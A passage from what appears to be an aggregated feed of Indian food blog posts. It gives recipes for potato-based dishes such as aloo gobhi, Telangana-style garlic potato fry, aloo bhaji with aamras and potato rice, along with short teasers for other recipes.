  • Add in the onions and green chillies and saute till the onions turn pinkish.
  • Add in the tomatoes, turmeric powder, chilli powder and salt, and cook until the tomatoes turn mushy and soft.
  • Once the tomatoes become soft, add the ginger garlic paste and cook till the raw flavor is lost.
  • Slowly add in the potato cubes and green peas and mix well. Adjust salt if needed and pour in 3/4 cup water.
  • Pressure cook on medium flame for 4 whistles.
  • Let the pressure release naturally. Open the lid and gently mix the gravy while you roughly mash a few potatoes here and there.
  • Mashing the potatoes will give a nice volume to the gravy. If you find the gravy thick, you can add some hot water and adjust the consistency.
  • Lastly, add the kasuri methi and fresh coriander. Serve hot with rotis, naan, steamed rice etc.

Some winter special recipes which you must try

Aloo Gobhi 

Lauki Channa Dal (video)

Palak Paneer 

Sabz Hariyali (video)

Gajar Halwa

Doodhi Halwa 

Gajar Mooli sabji 

Corn peas pulao 






Aloo Gobhi Sabji / Potato Cauliflower gravy - No onion No garlic sabzi

Aloo Gobhi is a classic winter delicacy. Piping hot phulkas/rotis and a bowl of delicious Aloo Gobhi curry is absolute bliss on a chilly winter night.

Very simple to make with just basic spices, Alu Gobhi sabji can be prepared in less than 15 mins. I saute the basic spices with tomato, potato and cauliflower and cook it in a pressure cooker for 1 whistle. This way it gets done quickly and perfectly.

The final garnish with fresh coriander is the icing on the cake; the smell of finely chopped kothmir when mixed with the curry kindles the appetite instantly. Those of you who like a little extra zing may squeeze some lime juice over the gravy.

Aloo Gobhi is a very popular side dish ordered in most restaurants and dhabas by all those who love typical North Indian flavors. We can make a dry curry like a stir fry using Aloo and Gobhi, or even a semi-liquid gravy.

We love the gravy type curry at home, so I prefer to make this for my family. A perfect choice for vegans as well as those who don't prefer to include onions and garlic in their meal.

I chose this recipe for our ongoing No Garlic No Onion recipes theme in the Shhh cooking secretly group. The theme was suggested by Priya Iyer, a versatile blogger. I was partnered with Sujata Ji for this theme, who has dished out a creamy and delectable Paneer Malai Curry.


Preparation Time - 15 mins
Cooking Time - 20 mins
Complexity - simple
Serves - 2 to 3

Ingredients 

1 medium sized Cauliflower 
2 medium Potatoes 
3 medium Tomatoes
2 Green chillies finely chopped
1/2 inch Ginger finely chopped
1/2 tsp Red chilli powder
1 tsp Dhaniya jeera powder
1/4 tsp Haldi / turmeric
1 tsp garam masala
1/2 tsp jeera
1/4 tsp saunf
Salt as required
Coriander leaves finely chopped
2 tsp Oil
Pinch of sugar

Method 


  • Cut out the florets from the main flower and soak them in salt and turmeric water. This helps clean out worms that are usually hidden inside the cauliflower. Discard the water after rinsing the florets well.
  • Cut the potatoes into small cubes and the tomatoes into medium chunks.
  • Heat the oil in the pressure cooker and splutter the jeera and saunf. Once they crackle, fry the chopped ginger and chillies.
  • Add the spices (turmeric, chilli powder, dhaniya jeera powder and garam masala) and fry on a low flame without burning the masalas.
  • Add the tomatoes and cook well until they turn mushy.
  • Add the potatoes and cauliflower and mix well. Adjust salt, add sugar and 1/2 cup water, and pressure cook for 1 whistle on medium flame.
  • Release the pressure naturally and give it a nice stir. Take 1 tbsp of the curry in a bowl and lightly mash it. Add it back to the gravy and give it a quick boil for 1 or 2 mins. This mashed portion gives the gravy some thickness and volume.
  • Garnish with fresh coriander, squeeze some lime just before serving, and serve hot.




South Indian Lunch Box Recipe Idea 2

The highlight of today’s lunch box recipe idea features healthy millet mini idlis, boiled sweet potato, and manually processed toor dal. The mini idlis I’ve packed are made from no rice Barnyard Millet Idlis, containing 100% millet and urad dal. Also for snack I packed the store bought baked cheetos. Sweet Potato The variety originating...


ALUGADDA ELLIPAYA KARAM

          Staying in Seattle you get used to graying weather in winter months every single day. I mean literally every day. And this gloomy weather makes me crave more spicy foods and this dish tops the quick-cooking foods. Alugadda ellipaya Karam or Garlicky Potato fry is a quick and easy stir-fry served as a side dish.

             This Telangana Style Potato Roast is a gluten-free, vegan, spicy side dish. It gets ready in under 15 minutes and makes a perfect winter dish to cook on busy weekdays. The reason why I say it’s perfect for winters is the generous usage of garlic, as garlic is considered warming food. Warming foods produce more heat in your body and keep your body warm enough to endure the chilly winter. Hence we include warming foods like sesame seeds, garlic, ginger, chilies, etc in our diet. 

What makes this Alugadda ellipaya karam special ?

         Telangana regional cuisine is all about spice and garlic, and this dish just depicts the true flavors of this beautiful cuisine. Alugadda is a potato in the Telangana Telugu dialect and ellipaya karam refers to garlic spice. We eat lots of garlic and we make this special garlic spice Ellipaya karam every winter to have it in our daily meals. Some people call this dish Alugadda fry, vellulli alugadda vepudu or Alugadda vepudu. You can also call it Garlicky Potato Roast, Potato Stir-Fry, Aloo Fry, or crispy Indian potatoes. 

       In this recipe, potatoes are tossed in basic Indian spices and quick-roasted in the pan on high flame till they turn golden and crispy! Oh Yum! writing this I’m salivating already. There was a time in my life, I used to carry only potato fry and rice in my lunchbox every single day during my schooling days. That’s how much I love this dish and I promise once you try this, you’re going to love it. Also, contrary to many beliefs, potatoes are a source of good carbs when consumed in moderation!  So do include this Alugadda ellipaya karam in your weekly menu! 

Check out more vegetarian sides and curries from my blog

Jackfruit ghee roast

Stuffed peppers in creamy tomato gravy

Dondakaya Barada

Lauki palak pakoda kadhi

Chana aloo masala

Potlakaya perugu pachadi

Munagaku podi pappu kura

Chamakura kadala pappu

Gobhi fry

Now let’s get into the recipe!!

ALUGADDA ELLIPAYA KARAM

Alugadda ellipaya karam is a quick and easy potato stir fry, loaded with garlic and Indian spices, making it the best side for Indian meals.
Course Side Dish
Cuisine Telangana, Telugu
Keyword Side dish, vegan, Vegetarian
Prep Time 8 minutes
Cook Time 12 minutes
Servings 3 Servings
Author Shravani Abhishek

Ingredients

  • 4 no Potatoes medium size
  • 2 tsp Red chili powder
  • Salt to taste
  • ½ tsp Turmeric powder
  • 8 cloves Garlic small size, coarsely crushed with cumin seeds
  • ½ tsp Mustard seeds
  • ½ + ½ tsp Cumin seeds
  • 1 sprig Curry leaves
  • 2 tbsp Desiccated coconut

Instructions

Let's prep the potatoes

  • Wash and peel the potatoes. Chop the potatoes into medium size cubes.
  • Add the chopped potatoes to a bowl of water to get rid of excess starch.
  • Peel the garlic cloves and coarsely crush them with ½ tsp cumin seeds in a mortar & pestle.

Let's start making Alugadda ellipaya karam

  • Heat a well-seasoned cast-iron or nonstick skillet, add oil and once it's hot add mustard seeds, cumin seeds and let them crackle.
  • Add curry leaves and let them crisp up. Now add the chopped potatoes and on high flame toss it well.
  • Sprinkle turmeric powder and salt. Toss the potatoes to coat them with the spices and cook on high flame for 3 more minutes.
  • Add the coarsely crushed garlic cloves with cumin seeds and toss the potatoes.
  • Keep the flame high and toss it regularly and roast it till the potatoes start crisping up and turning nice and golden brown.
  • Now add in red chili powder and give it a good toss.
  • Finally add in desiccated coconut / grated dry coconut and coat the potatoes.
  • Turn off the heat and serve hot alugadda ellipaya karam with rice and dal/rasam of your choice.

Notes

  • You can add ground coriander/dhaniya powder and garam masala for additional flavor.  

 If you’ve tried this recipe, please share your valuable feedback in the comments below. Also, you can Tag your photo and share it with #mycurryveda on Instagram @mycurryveda  or on Facebook. Also follow @taste.of.telangana on Instagram for more traditional recipes, culture, and stories.

The post ALUGADDA ELLIPAYA KARAM appeared first on mycurryveda.

Poori Bhaji Aamras - Summer Seasonal special

Poori Aamras and Aloo Bhaji is almost everyone's favorite in Maharashtra and Gujarat. There will hardly be anyone who wouldn't like this combo. During the mango season, this match made in heaven features in my home quite a few times, but surprisingly it never made it to the blog.

The recipe for Aamras and Puri is already on the blog, while that of this simple yet tasty Aloo Bhaaji or Sabji will be shared today with you all. Every household has an heirloom recipe for making the aloo sabji depending on the family's liking. I am going to share a very, very easy recipe which has always been our favorite. Preethi, my blogger friend, has a delicious recipe for Adraki Aloo which will also pair well with these puris. The aamras has a little milk added, while the aloo sabji is purely vegan. If you want to make the entire combo vegan friendly, you can skip the milk while preparing the aamras.

This combo is so popular and such a heartthrob that people swarm like bees at restaurants to enjoy it. Some popular restaurants in Bombay have carved a niche for serving this delectable mini thali during the mango season and have been featured in various food magazines and shows for their superior quality and popularity.



Preparation Time - 20 mins 
Cooking Time - 10 mins
Complexity - simple
Serves - 2 to 3 

Ingredients 

4 medium sized boiled potatoes 
2 small green chillies chopped
1/2 inch ginger finely chopped 
1 tsp mustard 
1/4 tsp udad dhall (optional)
1 tbsp oil
Pinch of turmeric 
1/4  tsp red chilli powder
Pinch of asafoetida 
1/2 tsp sugar
Salt as needed
Few curry leaves 
Finely chopped coriander

Method 

  • Peel the skin of the potatoes and roughly crumble them.
  • Heat oil in a thick pan, crackle the mustard seeds, then add the udad dhall and fry until the dal turns golden brown.
  • Fry the green chillies, ginger, curry leaves and asafoetida.
  • Add the crumbled potatoes, coriander leaves, turmeric, red chilli powder and salt, and mix well.
  • Sprinkle some water and cook covered for 2 to 3 mins till all the flavors blend well. Turn off the stove, add the sugar and chopped coriander, and mix gently.
  • Serve hot with hot puris and Aamras.
  • You can also serve some thick coconut chutney as an accompaniment.








Potato Rice - Urulaikizhangu Sadam

 POTATO RICE / URULAIKIZHANGU SADAM

Rice is the staple food throughout our country, especially so in the South, since it is widely cultivated in this region. Eating cooked plain rice along with dal and vegetables has been a daily routine since ancient times. Traditionally prepared Variety Rice, also known as Chitra Anna or Kalanda Sadam, is usually limited to traditional festive menus. Not anymore! Variety Rice has found its own special niche as a one pot meal in our daily meal plan.

People who have hectic work schedules prefer one pot meals / lunch box meals for the ease of cooking and cleaning and for the time saved. Variety Rice comes in handy in these situations. Other than Pulavs, Biriyanis and the traditional Chitra Annas, more and more innovative rice recipes with South Indian flavour are coming up on culinary platforms.

Here is a very simple Variety Rice prepared with potatoes, with the pleasant aroma of nutritious fenugreek leaves.

                                                                                                 
INGREDIENTS

Cooked rice - 2 cups

Potatoes (peeled and cubed) - 2 cups

Fenugreek leaves (washed and chopped) - 2 cups

Sesame oil - 2 tbsps

Mustard seeds - 1/4 tsp

Cumin seeds - 1/4 tsp

Asafoetida - 1 pinch

Curry leaves - a few

Turmeric powder - 1 pinch

Salt - 3/4 tsp

Sambar powder - 1 tsp

Chopped tomatoes - 1/2 cup 

METHOD

1. Heat oil in a kadai and splutter mustard seeds and cumin seeds.

2. Add asafoetida , turmeric powder and curry leaves.

3. Stir in the fenugreek leaves and cook till it wilts.

4. Add the potato cubes , stir , cover and cook on medium flame till almost done. 

                                                                                                                
5. Add salt and Sambar Powder and blend well with potatoes.

                                                                                                    
6. Cook till the potatoes are roasted and then add the tomatoes.

7. Keep stirring till the tomatoes are just cooked.

                                                                                         
8. Switch off flame and add cooked rice.

                                                                                          
9. Gently blend the rice well with the curry without mashing the rice or potatoes. A teaspoon of sesame oil can be added at this stage if you feel the rice is too dry.

                                                                                 
Enjoy the flavoursome Potato Rice with any raita of your choice or with thick plain curds.

Pumpkin & Potato in Mustard Oil

By: Rapti B
Pumpkin & potato are tempered with nigella seeds and slow-cooked in mustard oil for a dish that heroes the pumpkin’s sweetness.  Calling all home cooks looking for quick and healthy weekday/weeknight meal ideas – add this pumpkin & potato in mustard oil dish to your repertoire! It’s the kind that comes together in a jiffy, requires just one spice (coz salt and…

Sheekh Kebab Curry

By: Rapti B
A succulent, slightly spicy dish that comes together when sheekh kebabs and some veggies are simmered in a simple curry. Pair it with rice, roti or naan for a delicious meal. Frozen food, especially premade non-vegetarian food, has always been frowned upon in our household. The packets of readymade chicken tikkas and frozen mutton cutlets were only meant to be…